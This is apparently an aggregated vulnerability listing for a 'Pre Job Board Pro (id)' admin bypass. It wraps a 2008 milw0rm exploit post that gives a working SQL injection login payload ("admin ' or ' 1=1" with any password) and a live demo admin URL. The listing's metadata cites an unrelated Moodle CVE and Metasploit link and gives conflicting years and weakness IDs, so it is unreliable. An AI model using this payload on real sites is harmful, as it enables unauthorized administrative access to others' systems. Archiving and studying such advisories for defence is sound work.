Pre Job Board Pro (id) Remote Admin Bypass Vulnerability

vendor:

Job Board Pro (id)

by:

Maghribi WnaftakhaR

9.3

CVSS

HIGH

Remote Admin Bypass

287

CWE

Product Name: Job Board Pro (id)

Affected Version From: Job Board Pro (id)

Affected Version To: Job Board Pro (id)

Patch Exists: YES

Related CWE: CVE-2013-2245

CPE: cpe:a:preproject:job_board_pro_(id)

Metasploit: https://www.rapid7.com/db/vulnerabilities/moodle-cve-2013-2245/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2013

Pre Job Board Pro (id) Remote Admin Bypass Vulnerability

Pre Job Board Pro (id) is vulnerable to a remote admin bypass vulnerability. This vulnerability allows an attacker to gain access to the admin panel without authentication. This is due to a lack of authentication check in the admin panel. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Upgrade to the latest version of Pre Job Board Pro (id).

Source

Exploit-DB raw data:

*********************************************************************************************        
[!]                                                                                       [!]
[!] OOOO             O                                 OOOOOOOOO                          [!]
[!]O    O            O                                 O      O                           [!]
[!]O                 O                                       O                            [!]
[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
[!]          OO                                                                           [!]
[!]         OO                                                                            [!]
[!]        OO                          Proud To Be MoroCCaN                               [!]
[!]       OO                                                                              [!]
*********************************************************************************************
Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
---------------------------------------------------------------------------------------------
=              Pre Job Board Pro (id) Remote Admin Bypass Vulnerability                     =
---------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  Discovred By : Cyber-Zone                                          =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.IQ-Ty.CoM                                                   =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Download : http://preproject.com


Bypass :

Go To Admin Panel :

Login With this information :

Admin : admin ' or ' 1=1
pass  : Cyber-Zone or any thing

Leged in :)

Live demo :

http://preproject.com/jobdemo/siteadmin/index.php

EnjoY


---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
-=                                                                                         =-
-=                         The_5pectrum  , (JIKO)  No-Exploit                              =-
-=                                                                                         =-
-=                               Oujda SeCurity TeaM                                       =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

# milw0rm.com [2008-11-05]